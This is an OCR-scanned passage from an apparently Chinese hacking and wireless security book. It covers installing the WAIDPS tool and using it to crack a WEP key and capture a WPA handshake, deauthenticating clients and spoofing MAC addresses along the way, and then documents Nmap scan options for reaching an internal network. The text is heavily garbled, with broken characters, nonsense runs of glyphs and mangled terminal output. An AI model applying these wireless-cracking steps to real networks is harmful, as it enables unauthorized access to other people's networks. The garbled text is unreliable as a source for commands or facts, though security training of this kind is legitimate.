File Not found in /.SYWorks/WAIDPS/waidps.py 


Copy file from [/root/Downloads/waidps-master/waidps-master/waidps. 


You can now run from 
cd /.SYWorks/WAIDPS/ 


. /Waidps.py 


Press Any Key To Continue... 


e mac-oui.db 3 


Default Selected ==> YY 
Downloading file from https 


://raw.githubusercontent.com/SYWorks 
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在 攻击 时 ， 
志 中 。 


系统 会 显示 于 屏幕 并 记录 在 日 


安 疾 WAIDPS 


安装 WAIDPS 系 统 是 使 用 该 系统 进行 无 
线 入 侵 检测 的 前 提 。 安 装 WAIDPS 的 操作 步 
又 如 下 : 
打开 https://github.com/SYWorks/ 
Waidps 链 接 ， 单 击 Clone or download 按 钮 ， 
9 下 图 所 示 。 


9.5.1 


Find file | 


Clone with HTTPS Gy) 


Dpen in Desktop Download ZIP 


单 击 Download ZIP 按 钮 下 载 压缩 包 
解压 后 有 三 个 文件 ， 如 下 图 所 示 。 


LICENSE README.md waidps.py 


[step 图 切 换 到 文件 目录 ， 在 终端 执行 ./ 
wit py 命令 便 可 以 安装 WAIDPS， 首 次 运 
j 会 下 载 一 些 必要 的 文件 ， 如 下 图 所 示 。 


py] to [/.SYWorks/WAIDPS/waidps.py ] 


by doing the following : 


/Database/master/mac-oul .db 


File successfully saved to /.SYWorks/Database/mac-oui.db 


下 载 完 成 后 按 Enter 键 ， 会 给 出 WAIDPS 系 


\ 统 帮助 信息 ， 如 下 图 所 示 。 
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Creating database files.... 使 用 WAIDPS 之 前 建议 使 用 airmon-ng 
Ronning opplication without check kill 命 令 ， 关 闭 不 必要 的 进程 ， 如 下 图 
hy --help show basic help message and exit 所 7 过 


Show advanced help me5 ge andgd ex1t 


"i ~--iface <arg> - Set Interface to use 
tt --timeout <arg> - Duration to capture before analysing the captured data 


:~# airmon-ng check kill 


xamples: ./waidps.py --update 
/Waidps.py -i wlang 
./waidps.py --iface wlanl 


安装 完成 后 WAIDPS 会 在 根 目 好 创 ee ln 

建 .SYWorks 目 录 ，/.SYWorks/WAIDPS 是 主 

目录 ， 其 中 包含 waidsp.py 脚 本 文件 ， 如 下 使 用 airmon-ng start wlan0 命 令 ， 

图 所 示 。 将 无 线 网 卡 设置 成 monitor 模 式 ， 如 下 图 
:/.SYWorks# ls 所 示 。 


aptured Database Saved WAIDPS 
:/.SYWorks# cd WAIDPS/ 


illing these processes: 


2| 


\ 


:~ 大 alrmon-ng start wlang 


:/.SYWorks/WAIDPS# ls 
| pktconfig.ini Stn.DeAuth. 


HY Interface Driver Chipset 


phyg wlang rt2866uUsb Ralink Technology, Corp. RT2870/RT3879 


(mac8821]1] monitor mode vif enabled for [phy@]Jwlang on [phye]Jwlangmon 
(mac88211 station mode vif disabled for [phy6bjwlLang) 


9.5.2 ”局 动 WAIDPS 
sp 图 切换 到 WAIDPS 主 目录 ， 使 用 / 
安 产 好 WAIDPS 后 ， 就 可 以 局 动 WAIDPS Waidps.py -1 wlan0mon 局 动 WAIDPS 系 统 ， 


了 。 有 具体 操作 步骤 如 下 : 如 下 图 所 示 。 


Ht 并 到 炊 漆 亲 看好 六 立 间 痢 训 契 好 术 。。 漆 友 站 闪闪 检阅 阅 .6 
二 一 下 开放 ## 坟 并 说 订 认 检 天 认 
尖 攻 闪闪 办 兴 闻 闻 闪闪 洛 间 亲 尝 东兴 
琳 好 检 六 检 术 2 庆 闻 ”六 训 放疗 检 检 入 放 砍 如 天 简 弄 对 
其 其 ”并 并 天 玉林 检 让 地 存 一 一 ## 坟 天 站 六 
LL 闪闪 闪闪 闪 # 准 溢 齐 闪闪 并 六 
其 背 顾 六 下 并 检 术 并 放 本 好 失守 放 放 训 帮 闪失 。 放大 二 Version 1.0, R.6 (Updated - 10 Oct 2014) 


SIIY|lIWIIolIRIIKIIS|I JPIIRI1011SIIRIIAIINIINIIIIINI15SI syworks (at) gmail.com 


A Rn NE Cub LISTEN'G 
STA ENC CIPHER AUTH CH PWR Range 115 WPS Ver LCK ESSID 


33:CD:33:69:73 日 OPN None b 29 1 ,GOOI Unknowr 
58:A3:7D:37:91 日 OPN None = -54 Average - -~ ~ HUAWEI TECHNOLOGIES 


091:2F:68 日 WPA2 CCMP/TKIP PSK 1 .Go LINK TECHNDLOGII 
:7D:37:95 OPN - - Average - - - HUAWEI TECHNOLOGIES cC0. ,LTD 
CLient 1 5C:A8:6A:EC:A2:F8 - 818-11-21 62: Unknown 
2D:7D:8C A WPA2 CN ~ Good - - -~ Dm] 
CD:33:60:73 日 HPA2 CCN PSK 6 - - - Do 
89:1E:9D 2 P| 


如 果 没 有 做 出 其 他 操作 ， 默 认 等 待 30s 后 进入 扫描 状态 ， 如 下 图 所 示 。 
< < << SUMMARY LISTING >> > > 


: 13 196 WPS Update' Added : 10 (0 WPS) 


ALERT [1 


] SSID Name 
a, BSSID - :A3:7C:EF:F2 ] - Signal : -44 dBm / Good HUAWEI TECHNOLOG 
Details : None / - Channe] 1 CLient : 0 
Client ] 
， BSSID :15:;13:8C:10:;A2 ] - Signal : -56 dBm / Average HUAWET TECHNOLOGIE: 
Details : ' None / - Channel :; 1 Client ; 0 
Client [ ] 


Note :; Shown above are Access Points with Similar Name, Evil-Twin in normal cases are Usually open network ori is known. 
Senario where similar names are commonly found in organization, airport, mall, hotel, campus, etc where the area is big. 
Multiple found on said Access Point detect may indicate high possibility of 
Reported 2018-11-21 02:;29:;24 


step 图 在 扫描 状态 下 ，WAIDPS 会 开启 两 个 终端 窗口 ， 用 于 抓 取 数据 包 以 及 扫描 AP， 如 下 
图 所 示 。 
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Runnins gs user "root and aroup root", This could be donaerous 
or es 1 
"init, 和 has been dis Fe d due to runnins Hireshork oz 
ww 


er, S$ 
hark .orsrCoptureSetupe /CapturePrivileses For he le an Funnmins Hire rg a ee unp 


CH ll ][ EloFssd: 36 # ][ 2016-11-21 02334 JL 64r 86 117 
SS PHR Beocons #0ota, #4/s CH ENC CIPHER AUTH ESSID 


Sk mideo_ac_0962 
CHCC 


CHCC-KJ 
CHCC-XJ 


Ee TE 


通过 按 Enter 键 ， 切 换 到 命令 桶 


[Enter] 


马 

Nhe 
A 
> 上- 
] 汉 
RN 
3 


- About Application C - Application Configuation - Output Display 
- History Logs / Cracked DB L - Lookup MAC/Name Detail - Monitor MAC Addr / Names 
- Auditing Network I - Interactive Mode (Packet Analysis - Intrusion Prevention 


optio ( <default = return> ) 加 


[step[ 按 D 键 输出 显示 选项 ， 如 下 图 所 示 。 


rk Display 


This option allow user to switch display on the various viewing type of access point and station information. 


O/H - Hide both Access Points & Stations Listing Display 

1/A - Display Access Points Listing Only 

2/5 - Display Stations Listing Only 

3/B - Dispay Both Access Points & Stations Listing (Separated View) 


4/P - Advanced View with Probes Request (Merging associated Stations with Access Points) - 
5/0 - Advanced View without probing request (Merging associated Stations with Access Points) 


6/C - Display one time bar chart of Access Points information 

+/D - DispLay cLient which associated with more than one acceSss point. 
7/N Show Association/Connection Alert. 

8/U - Show Suspicious Activity Listing Alert. 

9/1 - Show Intrusion Detection/Attacks Alert. 


Current Setting = 
Choose an opt1ion Return : 而 


此 选项 允许 用 户 在 各 种 访问 点 和 站 点 信息 的 查看 类 型 上 切换 显示 。 
0/H: 隐藏 访问 点 和 站 点 列表 显示 。 
1/A: 仅 显 示 接 入 点 列表 ， 隐 藏 天 联 客户 机 。 

仅 显 示 客 户 机 列表 〈 包 含 关 联 与 不 关联 的 ) 

3/B: 在 不 同 区 域 分 别 显示 接 入 点 与 客户 机 列表 。 


ee ee e@ e 
7 


4 了: 带 有 探测 请 求 的 高 级 视图 (将 相关 的 站 点 与 接 入 点 合并 ) 


推荐 的 。 
e 5/O: 没有 探测 请 求 的 高 级 视图 (合并 相关 站 点 和 接 入 点 ) 
e 6/C: 显示 接 入 点 信息 的 时 间 条 形 图 。 


e +/D: 显示 与 多 个 接 入 扣 相 关联 的 客 己 端 ， 此 步骤 帮助 获知 际 目标 接 入 扣 外 ， 


还 有 其 他 接 入 点 。 
e 7/N: 显示 关联 /连接 警报 ， 默 认 是 开局 状态 。 
e 8/U: 显示 可 疑 活动 列表 警告， 默认 是 开局 状态 。 
e 9/[: 显示 入 侵 检 测 /攻击 警报 ， 默 认 是 开局 状态 。 
在 程序 中 输入 义 可 以 退出 程序 ， 如 下 图 所 示 。 


该 选项 也 是 默认 


ny 


黑客 攻防 与 无 线 妇 全 从 新 手 到 高 手 〈 超 值 版 ) 


Enter your option : ( <default = return> ) : X 
Selected ==> X 


Are YOU sure You want to exit ( y/N ) 


9.6 ”实战 演练 


实战 演练 1 一 一 使 用 WAIDPS 系 统 破解 WEP 密 码 
WAIDPS 入 侵 检 测 系 统 同样 具有 密码 破解 功能 ， 通 过 它 可 以 检查 网 络 设置 是 否 够 安 
全 。 破 解 WEP 密 人 码 步骤 如 下 : 


讲 入 WAIDPS 目 录 ， 使 用 ./waidps.py -i wlan0mon 命 令 启 动 WAIDPS 系 统 ， 按 Enter 
键 ， 切换 到 命令 模式 ,， 如 下 图 所 示 o 


[Enter] 


About Applicatio Application Configuation Output Display Filter Network Display 
History Loas / Cracked I Lookup MAC/Name Detail Monitor MAC Addr / Names Operation Dptions 
- Auditing Network - Interactive Mode (Packet Analysis) - Intrusion Prevention - Exit Application 


Enter your optio [ <default = return> ) : 


[steep 图 按 下 A 键 进 入 网 络 审计 页 面 ， 这 里 会 列 出 附近 AP 列 表 ， 如 下 图 所 示 。 


/IN MAC Address chn Enc CLphei Autl Ssignal Last Seen WPS STN ESSID 
] WEP WEP GCMP - 2018- -2 O3: 30:e€ 9 min ago] - 

6 WPA2 CCMP PSK 2018-11-21 903:30: 9 min 3g0] 

7 WPA2 CCMP PSK 2618-11-21 0903: ) min agol 

] WPA2 CCMP/TKIP PSK 2018-11-21 03:29 min ago0] 
1 
1 
7 


MR) a UN 
© 
[| 


FJ oo WNW NO 


WPA2 CCMP PSK 2018- -3 8983: 2 ] min ago0] 
3 WPA2 CCMP PSK 2018 21 03: 9 min agol 
WPA2 CCMP PSK 2618-11-21 03:2 min ago0] 
WPA2 CCMP PSK 2618-11-21 903:3 9 min ago0] 
WPA2 CCMP PSK 2018 21 03:3 9 min ago] 


Un uw 
inWW WII 


tiD ©00 
© 


WEP : 1 WPA/JWPA2 : 8 WPA/WPA2 (WPS Enabled) : 


Key in [Help] to display other options. 
Select a target/option ( Default - Return ) : 国 


step 图 输入 WEP， 和 筛选 出 WEP 加 密 的 AP 列 表 ， 如 下 图 所 示 。 


WEP 


MAC Address chn Enc Cipher Auth Signal Last Seen WPS STN ESSID 
| WEP WEP GCMP 2018-11-21 03:30:01 [9 min ago] 1 


Key in [Help] to display other options. 
Select a target/option ( Default - Return ) : 加 


[step 贺 这 里 可 以 通过 目标 MAC 地 址 或 者 序号 来 选择 AP， 因 为 只 有 一 项 所 以 选择 1 即 可 
会 给 出 建议 攻击 模式 ， 如 下 图 所 示 。 


风 


AP BSSID [ 1C:FA:68:01:2F:08 ] Signal 

MAC Addr [ 1C:FA:68:01:2F:68 ]'s MAC OUI belongs to | 

BSSID [ 1C:FA:68:91:2F:98 ]'s Name is [ Test-001 ] . 

Details : WEP WEP GCMP - Channel : 1 Client : 
Clients 


Please note that after target selection is confirm, all current monitoring process will be terminated. 


Suggested Attack Mode : WEP 


Crack WEP Access Point 
- Capture WPA Handshake 
- WPS Bruteforce PIN 
Live Monitor Access Point 
[?] Select an option ( 1/2/3/4/9 Default - 
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step 图 选择 第 一 项 使 用 WEP 方 式 攻 击 ， 这 里 会 给 出 提示 ， 是 否 使 用 虚假 MAC 地 址 ， 如 下 图 


[并] WEP Encryption Auditing 

Application will send broadcast deauthentication signal to all clients connected to the 
gnal between client and access point if any clients were found connected to the access point. 
[1 List of detected client MAC. 


[1] MAC ID : DC:6D:CD:66:FE:CB 


[?] Enter the MAC to Spoof Xxx:xx:xx:xx:xx:xx : ( Default - NIL ) : 


直接 按 Enter 键 ， WAIDPS 系 统 会 锁定 AP 并 尝试 使 用 虚假 MAC 地 址 进行 连接 ， 如 下 
图 所 示 。 


Time Start ; 20 


2618-11-21 63:45:54 - 
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[step 卫 | 按 Enter 键 ， 在 出 现 的 其 他 选项 中 ， 选 择 2 中 断 现 有 客户 端的 连接 ， 如 下 图 所 示 。 


- Stop Authentication 
- Deauth Client 
List Clients 
- Spoof MAC address 
Fl1 - Fake Authentication (1 Time) F2 - Fake Authentication (Continous) 
- Return 
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WARNING - NOT FOR ILLEGAL 
Key ln [Help] to display other options 
Select a target/option ( Default - Re 
Selected ==> 1 


这 里 建议 攻击 模式 为 WPA， 如 下 图 所 示 。 


黑客 攻防 与 无 线 妇 全 从 新 手 到 高 手 〈 超 值 版 ) 
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AP BSSID | ] Signal : -25 dBm 
MAC Addr [ 1LC:FA:68:01:2F:08 ]'s MAC OUI belongs to | NI 
BSSID [ 1C:FA:68:01:2F:08 |]'s Name is [| Test-001 |]. 
Details : WPA2 / CCMP/TKIP / PSK Channel : Client 


Previous Detail From Database 


Please note that after target selection is confirm, all current monitoring process will be terminated. 


Ssugge ted Attack Mode 


Crack WEP Access Point 
- Capture WPA Handshake 
- WPS Bruteforce PIN 
Live Monitor Access Point 
- Retrun 
[?] Select an option ( 1/2/3/4/90 Default 


按 Enhter 键 开始 通过 字典 进行 敌 码 破解 ， 如 下 图 所 示 。 


[1 工 ] Sshutting 
[.] j 


Selected Interface ==> 
Selected Monitoring Interface 
Selected Attacking Interface 
Selected Managing Interface 


[1| WPA Handshake Capturing 
Application will send broadcast deauthentication signal to all clients connected to the 
gnal between client and access point if any clients were found connected to the access point. 


[?] Previous Scan found [ ] client, Rescan for client ? ( Y/n ) :上 


step 图 设置 密码 位 置 ， 在 命令 模式 C 选 项 的 第 9 项 进行 设置 。 这 里 也 有 默认 密码 文件 ， 如 下 
图 所 示 。 


Command Selection Menu 
- About Applicatior - Application Configuation D - Output Display - Filter Network Display 
~ History Logs / Cracked DB - Lookup MAC/Name Detail - Monitor MAC Addr / Names ~ OQperation OQptions 
Auditing Network Interactive Mode 【Packet Analysis) Intrusion Prevention Exit Application 


Enter your option : ( <default = return> ) : © 


Application Confiqguation 
1 change Regulatory Domain 
'R - Refreshing rate of information 
Time before removing inactive AP/Station 
Hide inactive Access Point/Station 
/B - Beep 1f alert found 
Sensitivity of IDS 
Save Pcap when Attack detected 
-~ Save PCap when Monitored MAC/Name seen 
/W - Whitelist Setting [Bypass alert for MAC/Name) 
/I Dictionary Detail and setting [ 


Choose an option ( D/R/T/H/B/W/C ) : | 


Dictionary Setting 
This option allow user to add list of dictionary for passwords cracking.. 


- Add dictionary location 

- Set default dictionary 

- Delete dictionary location 
Select an option ( A/S/D ) 
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第 9 章 ”无线 网 络 中 的 虚拟 AP 技术 一 一 


9.7 “小 试 身 手 
练习 1: 熟悉 虚拟 AP 技术 ， 人 懂得 如 何 防 御 虚 拟 AP。 


练习 2: 使 用 Windows10 系 统 搭 建 虚 拟 AP。 
练习 3: 搭建 WAIDPS 无 线 网 络 入 侵 检测 系统 。 
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第 10 草 ”从 无 线 网 络 渗透 内 网 


网 络 通信 是 基于 TCP/IP 的 四 层 网 络 模型 ， 因 此 在 每 一 层 都 可 以 通过 特定 的 通信 协议 发 


现存 活 主 机 ， 从 而 实现 从 无 线 网 络 渗透 到 内 网 的 操作 。 本 章 介 2 


召 从 无 线 网 络 渗透 到 内 网 的 


方法 ， 主 要 包括 扫描 工具 Nmap 的 应 用 、 二 层 扫 描 、 三 层 扫 描 、 四 层 扫 描 等 。 


10.1 认识 扫描 工具 Nmap 


Nmap 是 一 个 网 络 连 接 端 扫描 软件 ， 
通过 扫 拉 可 以 确定 哪些 服务 运行 在 哪些 连 
接 端 ， 并 且 推 断 计算 机 运行 哪个 操作 系 


统 ， 是 网 络 管理 员 常 用 的 扫描 软件 之 一 。 
直接 输入 Nmap 命 令 ， 便 会 打开 Nmap 的 帮 
助 信 息 。 


10.1.1 目标 发 现 帮助 信息 


除了 选项 ， 所 有 出 现在 Nmap 命 令 行 上 
的 都 被 视 为 对 目标 主机 的 说 明 ， 最 简单 的 
情况 是 指定 一 个 目标 IP 地 址 或 主机 名 。 下 图 
为 目标 发 现 的 帮助 信息 。 


T 


Can pass hostnames, IP addresses, networks, etc. 
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254 
-iL <inputfilename>: Input from list of hosts/networks 

-iR <num hosts>: Choose random targets 

--eExclude <host1[,host2][,host3],...>: Exclude hosts/networks 
--excludefile <exclude file>: Exclude list from file 


参数 说 明 如 下 : 

e -iL <inputfilename>: 将 不 同 的 IP 
地 址 保存 成 文件 ， 用 这 个 参数 导入 
文件 。 

e@ -iR <num hosts>: 随机 选择 目标 ， 
num hosts 表 示 目 标 数 目 ，0 表 示 扫 
描 不 中 断 。 例 如 : Nmap -iR 100 -p 
135 任 意 选 取 100 个 IP 地 址 扫描 135 
端口 。 

© --exclude <hostl |, host2| |, host3 |， 
...>: 排除 主机 /网 络 ， 例 如 : Nmap 
192.168.1.0/24 --exclude 1-100 去 除 掉 
前 100 个 地 址 ， 从 101 开 始 扫 描 。 


@ --excludefile <exclude file>: 将 需要 


排除 的 地 址 存放 到 一 个 文件 当中 ， 
用 该 参数 指定 。 


10.1.2 主机 发 现 帮助 信息 


任何 网 络 探测 任务 的 最 初 几 个 步 又 就 
是 把 一 组 IP 范 围 (有 时 该 范围 很 大 ) 缩小 为 
一 列 活动 的 或 者 感 兴趣 的 主机 ， 扫 描 每 个 卫 
的 每 个 端口 很 慢 ， 通 第 也 没 必要 ， 扫 摘 什 
么 样 的 主机 主要 依赖 于 扫描 的 目的 。 

发 送 探测 包 到 目标 主机 ， 硅 收 到 回 
复 ， 则 说 明 目 标 主机 是 开启 的 ，Nmap 文 持 
约 10 种 不 同 的 主机 探测 方式 ， 默 认 发 送 4 种 
请 求 : 

(1) ICMP echo request。 

(2) a TCP SYN packet to port 443 。 

(3) a TCP ACK packet to port 80。 

(4) an ICMP timestamp request。 


主机 发 现 帮 助 信息 ， 如 下 图 所 示 。 


HUST UJISLUVERTY : 
-slL: List Scan - simply List targets to scan 
-Sn: Ping Scan - disable port scan 
-Pn: Treat all hosts as online -- 


skip Ee Ey 
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports 
-PE/PP/PM: ICMP echo, timestamp, and i oe reguest discovery RE 
人 list]: IP Ping 
/-R do on/Always resolve [default: sometimes] 
| = -dns- servers <servll, sale ..>: Specify custom DNS servers 
--System-dns: Use 05's DNS resolver 
--traceroute: path to 


参数 说 明 如 下 : 

e -sL: List Scan 列表 扫描 ， 仪 将 指定 
的 目标 人 P 列 举 出 来 ， 并 不 进行 扫描 。 
例如 : Namp -sL 192.168.1.0/28。 

e -sn: Ping Scan 只 利用 Ping 扫 描 进 
行 主机 发 现 ， 不 进行 端口 扫描 。 默 
认 情 况 下 发 送 ICMP 回 声 请 求 和 一 
个 TCP 报 文 到 80 端 口 ， 非 特权 用 户 
发 送 一 个 SYN 报 文 到 80 闯 口 。 可 以 


ch host 
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认 情 况 下 发 送 ICMP 回 声 请 求 和 一 
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发 送 一 个 SYN 报 文 到 80 闯 口 。 可 以 


ch host 


黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


1. open〔 开 放 的 ) 


应 用 程序 正在 该 端口 接收 TCP 连 接 或 者 
UDP 报 文 ， 发现 这 一 点 常常 是 端口 扫描 的 
主要 目标 。 安 全 意识 强 的 人 都 知道 每 个 开 
放 的 端口 都 有 可 能 是 攻击 的 入 口 。 攻 击 者 
或 者 入 侵 测 试 者 想 要 发 现 开 放 的 端口 。 而 
管理 员 则 试图 关闭 它们 或 者 用 防火 墙 保护 
它们 ， 以 免 妨 碍 合法 用 户 ， 非 安全 扫描 可 
能 对 开放 的 端口 也 感 兴趣 ， 因 为 它们 显示 
了 网 络 上 哪些 服务 可 供 使 用 。 


2. closed (关闭 的 ) 

关闭 的 端口 对 于 Nmap 也 是 可 访问 的 
( 它 接受 Nmap 的 探测 报 文 并 做 出 啊 应 〉， 
但 没有 应 用 程序 在 其 上 监听 ， 它 们 可 以 显 
示 该 IP 地 址 上 (主机 发 现 ， 或 者 Ping 扫 摘 )》 
的 主机 正在 运行 up 也 对 部 分 操作 系统 探测 
有 所 帮助 。 因 为 关闭 的 端口 是 可 访问 的 ， 
也 许 过 会 儿 值 得 再 扫描 一 下 ， 可 能 一 些 又 
开放 了 。 系 统管 理 员 可 能 会 考虑 用 防火 墙 
封锁 这 样 的 端口 ， 因 此 就 会 被 显示 为 被 过 


3. filtered (被 过 滤 的 ) 


由 于 包 过 滤 阻 止 探测 报 文 到 达 端 口 ， 
Nmap 无 法 确定 该 端口 是 否 开 放 ， 过 滤 可 能 
来 自 专 业 的 防火 墙 设备 、 路 由 器 规则 或 者 
主机 上 的 软件 防火 墙 ， 这 样 的 端口 一 般 扫 
描 几 乎 不 提供 任何 信息 。 有 时 候 它 们 响应 
ICMP 错 误 消 息 ， 如 类 型 3 代码 13 (无 法 到 
达 目 标 : 通信 被 管理 员 禁 止 ) ， 但 更 普遍 
的 是 过 滤器 只 是 丢弃 探测 帧 ， 不 做 任何 响 
应 。 这 迫使 Nmap 重 试 知 干 次 以 防 探测 包 是 
由 于 网 络 阻塞 而 丢弃 的 ， 由 此 使 得 扫描 速 
度 明 显 变 慢 。 


4. unfiltered (未 被 过 滤 的 ) 


未 被 过 滤 状 态 意 味 痢 闯 口 可 访问 ， 但 
Nmap 不 能 确定 它 是 开放 还 是 关闭 ， 只 有 用 
于 映射 防火 墙 规则 集 的 ACK 扫 摘 才 会 把 端 
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口 分 类 到 这 种 状态 。 用 其 他 类 型 的 扫描 如 
窗口 扫描 、SYN 扫 描 或 者 FIN 扫 描 来 扫描 
未 被 过 滤 的 端口 ， 可 以 帮助 确定 端口 是 人 否 
开放 。 


5. openlfiltered (开放 或 者 被 过 滤 的 ) 

当 无 法 确定 端口 是 开放 还 是 被 过 滤 
的 ，Nmap 就 把 该 端口 划分 成 这 种 状态 。 开 
放 的 端口 不 啊 应 就 是 一 个 例子 。 没 有 啊 应 
也 可 能 意味 着 报 文 过 滤器 丢弃 了 探测 报 文 
或 者 它 引 发 的 任何 啊 应 ， 因 此 Nmap 无 法 确 
定 该 端口 是 开放 的 还 是 被 过 滤 的 。 


6. closedlfiltered (关闭 或 者 被 过 
滤 的 ) 


该 状态 用 于 Nmap 不 能 确定 端口 是 关闭 
的 还 是 被 过 滤 的 ， 它 只 可 能 出 现在 IPID Idle 
扫描 中 。 

端口 扫描 的 帮助 信息 ， 如 下 图 所 示 。 


-SS/ST/SA/SW/SM: TCP SYN/Connect()/ACK/Window/Maimon scans 
-SU: UDP Scan 

-SN/sF/sX: TCP Null, FIN, and Xmas scans 
--scanflags <flags>: Customize TCP scan flags 
-SI <zombie host[:probeport]>: Idle Scan 
-SY/SZ: SCTP INIT/COOKIE-ECHO scans 

-S0: IP protocol Scan 

-b <FTP relay host>: FTP bounce scan 


参数 说 明 如 下 : 

e -sS: TCP SYN 扫 描 ， 半 开放 扫描 ， 
扫描 速度 快 ， 不 易 被 注意 到 不 
完成 TCP 连 接 ) ， 且 能 明确 区 分 
openlclosed|filtered。 

e -sT: TCP Connect( 扫 描 ， 建 立 完 整 
连接 ， 容 易 被 记录 ， 对 原始 报 文 控 
制 少 ， 效 率 低 但 是 准确 。 

e -SA: TCPACK 扫 描 ， 发 送 一 个 ACK 
数据 包 ， 通 过 SYN/ACK 返 回 数据 包 
类 型 判断 防火 墙 规则 。 

e -sW: TCP Window 扫 描 ，TCP 窗 口 
扫描 ， 依 赖 于 互联 网 上 少数 系统 
的 实现 细节 ， 因 此 可 信和 度 不 高 ， 
根据 窗口 大 小 来 判断 端口 是 开放 
的 〈 正 数 ) 还 是 关闭 的 (0) 。 


10.1.4 


-SM: TCP Maimon 扫 描 ， 探 测报 文 
是 FIN/ACK， 端 口 开 放 或 关闭 ， 都 
对 这 样 的 报 文 响应 RST 报 文 ， 但 如 
果 疹 口 开 放 ， 许 多 基于 BSD 的 系统 
只 是 丢弃 该 探测 报 文 。 

-SU: 使 用 UDP 扫描 ， 对 UDP 服务 
进行 扫描 ， 如 DNS、SNMP、DHCP 
和 等。 可 以 和 TCP 扫 描 结合 使 用 ， 但 
是 效率 低下 ， 开 放 的 和 被 过 滤 的 端 
口 很 少 响应 。 加 速 UDP 扫 描 的 方法 
包括 并 发 扫描 更 多 的 主机 、 先 只 对 
主要 端口 进行 快速 扫描 、 从 防火 场 
后 面 扫描 、 使 用 -host-timeout 跳 过 慢 
速 的 主机 。 

-SN/-sF/-sX: TCP Null, FIN, and 
Xmas 扫 描 ， 从 RFC 挖 掘 的 微妙 方 
法 来 区 分 开放 关闭 端口 ; 除了 探 
测报 文 的 标志 位 不 同 ， 三 种 扫描 
在 行为 上 一 致 。 
-scanflags<flags>: 通过 指定 任意 
的 TCP 标 志 位 来 设计 扫描 ， 可 以 是 
数字 标记 值 ， 也 可 以 使 用 字符 名 如 
URG、ACKE、PSH、RST、SYN、 
FIN 。 

-SI <zombie host[:probeport]>: 中 间 
人 扫描 ， 利 用 中 间 人 主机 上 已 知 了 了 
分 段 ID 序列 生成 算法 来 笑 探 目标 上 
开放 端口 的 信息 ， 极 端 隐蔽 ， 可 以 
指定 闯 口 号 ， 人 否则 默认 80 端 口 。 
-SY/SZ: 是 针对 SCTP 协 议 的 扫描 ， 
很 少 使 用 。 

-SO: 卫 协 议 扫描 ， 可 以 确定 目标 机 
文 持 哪 些 IP 协 议 ， 如 TCP、ICMP、 
IGMP 。 

-b <FTP relay host>: FTP 弹 跳 扫 
描 ，FTP 中 继 的 一 个 扫描 。 


端口 说 了 明和 扫描 顺序 


这 类 参数 通常 指定 要 扫描 哪些 端口 ， 
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扫 揪 病 口 的 顺序 是 随机 的 还 是 依次 扫 揪 ， 
还 可 以 指定 扫描 端口 的 协议 类 型 。 
下 图 为 端口 说 明和 扫描 顺序 帮助 信息 。 


CAT eR: 和 
rt ranges>: Only 5can specified ports 
-p22; -pl1-65535; -p U:53,11]1,137,T:21-25,80,139,8080,5:9 
orts <port ranges>; Exclu 二 spec ed ports from scanningl 
mode - Scan fewer ports than the default scan 
ports consecutively - don't randomize 
op-ports <number>: Scan <number> most common ports 
-ratio <ratio>: Scan ports more common than <ratio> 


参数 说 明 如 下 : 

e -p <port ranges>: 只 扫描 指定 的 端 
口 ， 单 个 跨 口 和 用 连 字符 表示 的 端 
口 范 围 都 可 以 ， 如 果 不 指定 扫描 类 
型 ， 默 认 是 TCP 和 UDP 都 扫描 ， 可 
以 通过 在 端口 号 前 加 上 T: 或 者 U: 指 
定 协议 。 例 如 : 参数 -p U:53，111， 
137，T:21-25，80，139，8080 将 扫 
描 UDP 端口 533，111， 和 137， 同 时 
扫描 列 出 的 TCP 端 口 。 

e@ --exclude-ports<port ranges>: 用 于 
过 滤 掉 其 中 的 一 段 。 

e -F: 快速 扫描 《 仅 扫 描 100 个 最 常用 
的 问 口 ) ，Nmap-services 文 件 指 定 
想 要 扫描 的 端口 ， 可 以 用 --datadir 选 
项 指定 自己 的 Nmap-services 文 件 。 

e -I: 默认 情况 下 按 随机 端口 扫 
描 ， 如 果 加 上 该 参数 ， 则 扫描 按 
照 顺序 执行 。 

e --top-ports<number>: 指定 靠 前 的 端 
口 数 进行 扫 摘 。 

e --port-ratio<rativ>: 扫描 一 些 更 
第 见 的 端口 。 


10.1.5 ”服务 与 版 本 探测 一 一 脚本 扫 拍 
在 端口 扫描 过 程 中 可 以 判断 该 端口 使 
用 的 是 什么 类 型 的 服务 ， 这 时 使 用 下 面 这 
些 参 数 来 设置 探测 服务 规则 ，Nmap 提 供 了 
大 量 的 脚本 ， 通 过 参数 指定 调用 这 些 脚 本 
可 以 更 好 地 完成 扫描 任务 。 
下 图 为 服务 与 版 本 探测 帮助 信息 。 
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ERVIUE/VERSIUN UETELCTIUN : 
-SV: Probe open ports to determine service/version info 
--version-intensity <level>: Set from © (light) to 9 (try all probes) 
--version-light: Limit to most likely probes (intensity 2) 
--version-all: Try every single probe (intensity 9) 
--version-trace: Show detailed version scan activity (for debugging) 


参数 说 明 如 下 : 

e -SV: 局 用 特征 探测 ， 通 过 从 特征 库 
的 比 对 判断 服务 类 型 。 

e@ --version-intensity <level>: 启用 特 

征 探测 也 并 不 是 将 采集 的 信息 与 特 
征 库 的 所 有 信息 进行 匹配 ， 因 此 使 
用 该 参数 设置 探测 级 别 ， 探 测 级 别 
越 高 匹配 信息 越 多 。 
--Version-light: 设置 扫描 级 别 为 2。 
--version-all: 设置 扫 摘 级 别 为 9。 
--version-trace: 将 扫描 的 结果 进行 
一 次 跟踪 。 

下 图 为 脚本 扫描 的 帮助 信息 。 


BCRIPT SCAN: 
-SC: equivalent to --script=default 
--Script=<Lua scripts>: <Lua scripts> is a comma separated list of 
directories, script-files or script-categories 
--script-args=<n1l=v1, [nN2=V2,...]>: provide arguments to scripts 
--Sscript-args-file=filename: provide NSE script args in a file 
--script-trace: Show all data sent and received 
--script-updatedb: Update the script database. 
--script-help=<Lua scripts>: Show help about scripts. 
<Lua scripts> is a comma-separated list of script-files or 
script-categories. 


参数 说 明 如 下 : 

e -sC: 指定 一 个 具体 脚本 ，--script 参 
数 的 一 个 简写 。 

e --script=<Lua scripts>: 指定 一 个 Lua 
的 脚本 。 

@ --ScIlpt-args=<n1l=vl.|n2=vV2,...|>: 指 
定 脚本 的 参数 。 

e --script-ares-file=filename: 同上 和 面 类 
似 ， 指 定 一 个 文件 名 作为 参数 。 

e --script-trace: 脚本 扫描 的 一 个 
跟 踩 。 

e --script-updatedb: 更 新 脚本 数 
据 库 。 

e --script-help=<Lua scripts>: 提供 脚 
本 的 帮助 信息 。 


